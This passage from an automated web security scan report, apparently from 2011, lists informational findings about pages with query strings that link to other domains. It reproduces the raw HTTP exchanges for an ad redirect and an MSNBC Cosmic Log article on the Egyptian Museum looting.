Server: Cookie Matcher
Content-Length: 341
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://pix04.revsci.net/D08734/a1/0/0/0.gif?D=DM_LOC%3Dhttp%253A%252F%252Fgoogle.com%252F0.gif%253Fid%253DCAESEFlfd-sZ8CX6_Cz86QSvO_0&amp;cver=1">here</A>
...[SNIP]...

22.58. http://cms.ad.yieldmanager.net/v1/cms

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cms.ad.yieldmanager.net
Path:   /v1/cms

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following link to another domain:

Request

GET /v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578 HTTP/1.1
Host: cms.ad.yieldmanager.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 02:07:53 GMT
Location: http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&nwid=10000040578
Cache-Control: private
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 411

The document has moved <A HREF="http://cookex.amp.yahoo.com/v2/cexposer/SIG=13ahi2098/*http%3A//cms.ad.yieldmanager.net/v1/cms?esig=1~ed097b82db382a1fd455fb947bcd01b57e206e42&amp;nwid=10000040578">here</A>
...[SNIP]...

22.59. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches?GT1=43001
Content-Type: text/html
Cache-Control: max-age=282
Date: Sat, 29 Jan 2011 23:45:48 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Egyptians ru
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5943271&amp;rand=2029045702&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a>, or connect via <a href="http://www.facebook.com/cosmiclog" target="_blank">Facebook</a> or <a href="http://twitter.com/b0yle" target="_blank">Twitter</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/CosmicLog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
nment policies. "I am calling on the Egyptian army to head instantly to the Egyptian Museum. There is a fire right next to it in the party headquarters," he told the Al Arabiya television channel in a <a target="_blank" href="http://www.reuters.com/article/2011/01/28/us-egypt-museum-idUSTRE70R7K820110128">report relayed by Reuters</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<p itxtvisited="1">"I felt deeply sorry today when I came this morning to the Egyptian Museum and found that some had tried to raid the museum by force last night,"&nbsp;<a href="http://af.reuters.com/article/egyptNews/idAFLDE70S0BG20110129">Reuters quoted him as saying</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
said its TV crew was allowed into the museum and&nbsp;saw&nbsp;the vandalized mummies as well as at least 10 other&nbsp;artifacts that had been taken out of their glass display cases and damaged. The <a target="_blank" href="http://english.aljazeera.net/news/middleeast/2011/01/2011129175926266521.html">Al Jazeera news service </a>
...[SNIP]...
Hawass said the collection was still at risk, due to the proximity of the fire-ravaged party headquarters. "What scares me is that if this building is destroyed, it will fall over the museum," Hawass <a target="_blank" href="http://www.google.com/hostednews/canadianpress/article/ALeqM5jltiUv0XPnEnWrQOQKh5QQTLbFjg?docId=5793584">told reporters</a>
...[SNIP]...
</a> community by clicking the "like" button on <a target="_blank" href="http://www.facebook.com/cosmiclog">our Facebook page</a> or by following msnbc.com science editor Alan Boyle as <a href="http://twitter.com/b0yle">b0yle on Twitter</a>. To learn more about Alan Boyle's book about Pluto and the search for planets, check out the <a target="_blank" href="http://www.thecaseforpluto.com/">website for "The Case for Pluto."</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="cosmiclog" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches" data-Text="Egyptians rush to save Tut's riches">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://bspurloc.newsvine.com/">bspurloc</a>
...[SNIP]...
<div class="normal"><a href="http://crappygovernment.newsvine.com/">Ben-1671313</a>
...[SNIP]...
<div class="normal"><a href="http://cristofocristofo.newsvine.com/">Teacher Trish</a>
...[SNIP]...
<div class="normal"><a href="http://Kathy-1571680.newsvine.com/">Kathy-1571680</a>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
<div class="normal"><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="normal"><a href="http://freedman1-1.newsvine.com/">freedman1</a>
...[SNIP]...
<div class="normal"><a href="http://kevpatok.newsvine.com/">kpokeefe</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://johntitor1.newsvine.com/">John Titor</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://gregb2.newsvine.com/">GregB-2059108</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://CRStardust.newsvine.com/">Stardust-649419</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://AndieSanDiegoCA.newsvine.com/">Andie,San Diego, CA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://demmcc.newsvine.com/">dave-1186103</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://optomyst-1.newsvine.com/">Optomyst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DaveKnightstable.newsvine.com/">Dave Knightstable</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://wtfever.newsvine.com/">ZillaKilla</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://angie1939907.newsvine.com/">angie-1939907</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://piotrpanne.newsvine.com/">cheetah-822547</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://DoubleG2996677.newsvine.com/">DoubleG-2996677</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://morphine-carnival.newsvine.com/">~m~(O)~r~phine Carnival</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lola3.newsvine.com/">lola3</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://declan01.newsvine.com/">dman-353357</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BlackshoesBlacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://trobertz.newsvine.com/">scales67</a>
...[SNIP]...
<p><a href="http://blackshoesblacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://AJPAGE.newsvine.com/">Page CN</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://selmor101.newsvine.com/">Roger-535160</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Alan1380274.newsvine.com/">Alan-1380274</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://morriswise2276198.newsvine.com/">morris wise-2276198</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://henrybadgood.newsvine.com/">henrybadgood</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jtjsrch.newsvine.com/">John-334951</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://ALLY2998591.newsvine.com/">ALLY-2998591</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://EvilJason.newsvine.com/">Evil Jason</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Freemannogod.newsvine.com/">Freemannogod</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="privacytext"><a href="http://www.newsvine.com/_nv/cms/info/privacyPolicy" target="_blank">Newsvine Privacy Statement</a></div><img class="postCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif" /><img class="postingCommentImage" src="http://www.polls.newsvine.com/_vine/images/_/b_posting.gif" /></div>
...[SNIP]...
<div class="newuser">As a new user, you may notice a few temporary content restrictions. <a href="http://www.newsvine.com/_nv/cms/help/newUsers" target="_blank">Click here for more info</a>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif" width="12" height="12" alt="Start Tracking" title="Add this article to your conversation tracker without commenting on it" />Start Tracking</span>
...[SNIP]...
<span><img src="http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif" width="10" height="10" alt="Stop Tracking" />Stop Tracking</span>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="avatar"><a href="http://boyle.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/badastronomy/">Bad Astronomy</a>
...[SNIP]...
<li><a href="http://www.collectspace.com/">CollectSpace</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/cosmicvariance/">Cosmic Variance</a>
...[SNIP]...
<li><a href="http://curmudgeons.blogspot.com/">Curmudgeons Corner</a>
...[SNIP]...
<li><a href="http://news.discovery.com/">Discovery News</a>
...[SNIP]...
<li><a href="http://www.dailygrail.com/">The Daily Grail</a>
...[SNIP]...
<li><a href="http://earthsky.org/">EarthSky</a></li><li><a href="http://www.geekpress.com/">GeekPress</a></li><li><a href="http://www.habitablezone.com/space/">Habitable Zone</a>
...[SNIP]...
<li><a href="http://www.hobbyspace.com/">HobbySpace Log</a>
...[SNIP]...
<li><a href="http://www.livescience.com/">LiveScience</a>
...[SNIP]...
<li><a href="http://blogs.discovermagazine.com/loom/">The Loom</a></li><li><a href="http://www.nasawatch.com/">NASA Watch</a></li><li><a href="http://www.nasaspaceflight.com/">NASA Spaceflight</a>
...[SNIP]...
<li><a href="http://www.outofthecradle.net/">Out of the Cradle</a>
...[SNIP]...
<li><a href="http://www.scidev.net/">SciDev.net</a></li><li><a href="http://www.scienceblog.com/cms/index.php">Science Blog</a>
...[SNIP]...
<li><a href="http://www.scienceblogs.com/">ScienceBlogs</a>
...[SNIP]...
<li><a href="http://www.signonsandiego.com/news/blogs/science-quest/">Science Quest</a>
...[SNIP]...
<li><a href="http://www.scientificamerican.com/blog/observations/">SciAm Observations</a>
...[SNIP]...
<li><a href="http://seedmagazine.com/">Seed Magazine</a>
...[SNIP]...
<li><a href="http://science.slashdot.org">Slashdot Science</a>
...[SNIP]...
<li><a href="http://www.space.com/">Space.com</a></li><li><a href="http://www.spacedaily.com/">Spaceflight Now</a>
...[SNIP]...
<li><a href="http://spacefellowship.com/">Space Fellowship</a>
...[SNIP]...
<li><a href="http://www.thespacereview.com/">The Space Review</a>
...[SNIP]...
<li><a href="http://www.transterrestrial.com/">Transterrestrial Musings</a>
...[SNIP]...
<li><a href="http://http://www.universetoday.com/">Universe Today</a>
...[SNIP]...
<li><a href="http://www.unmannedspaceflight.com">Unmanned Spaceflight</a>
...[SNIP]...
<li><a href="http://trueslant.com/milesobrien/">Uplink by Miles O'Brien</a>
...[SNIP]...
<li><a href="http://planetary.org/blog">Planetary Society Blog</a>
...[SNIP]...
<li><a href="http://www.sciencenews.org/">Science News</a>
...[SNIP]...
<li><a href="http://www.popularmechanics.com/">Popular Mechanics</a>
...[SNIP]...
<li><a href="http://www.popsci.com/">Popular Science</a>
...[SNIP]...
<li><a href="http://news.sciencemag.org/scienceinsider/">Science Insider</a>
...[SNIP]...
<li><a href="http://nasaengineer.com/">NASAEngineer.com</a>
...[SNIP]...
<li><a href="http://eurekalert.org/">EurekAlert</a></li><li><a href="http://blogs.nature.com/news/thegreatbeyond/">Nature: The Great Beyond</a>
...[SNIP]...
<li><a href="http://www.spacedaily.com/">Space Daily</a>
...[SNIP]...
<li><a href="http://www.spacepolitics.com">Space Politics</a>
...[SNIP]...
<div class="rawhtml_contents clearer clearfix rawhtml_BlogAuthorPromo"><a href="http://www.thecaseforpluto.com/" title="The Case for Pluto"><img src="http://www.thecaseforpluto.com/cover.jpg" width="85" height="129" align="left" border="0" style="padding:0 10px 10px 0;" /></a>Alan Boyle's first book tells the story of Pluto's ups and downs as well as the discoveries of other dwarf planets in our own solar system and even more alien worlds beyond. <a href="http://www.thecaseforpluto.com/" title="The Case for Pluto">Buy "The Case for Pluto" ...</a>
...[SNIP]...
<div class="avatar"><a href="http://jimseida.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/cycler-1339318757.jpg" width="60" height="60" /></a>
...[SNIP]...
<div class="avatar"><a href="http://john-roach.newsvine.com/"><img class="noborder" src="http://www.polls.newsvine.com/_vine/images/av/60x60/jtroach-2120073942.jpg" width="60" height="60" /></a>
...[SNIP]...
<li><a href="http://redtape.msnbc.com/">Red Tape Chronicles</a>
...[SNIP]...
<a href="http://www.msnbc.redacted/"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png" alt="msnbc.com" width="166" height="20"></a>
...[SNIP]...
<li>
                   <a href="http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.redacted/">MSN Privacy</a>
...[SNIP]...
<li>
                   <a href="http://help.live.com/help.aspx?project=tou&amp;mkt=en-us">Legal</a>
...[SNIP]...
</div><link rel="stylesheet" type="text/css" href="http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css">
<script type="text/javascript" language="JavaScript">
...[SNIP]...

22.60. http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cosmiclog.msnbc.redacted
Path:   /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /_news/2011/01/28/5943271-egyptians-rush-to-save-tuts-riches/?GT1=43001 HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
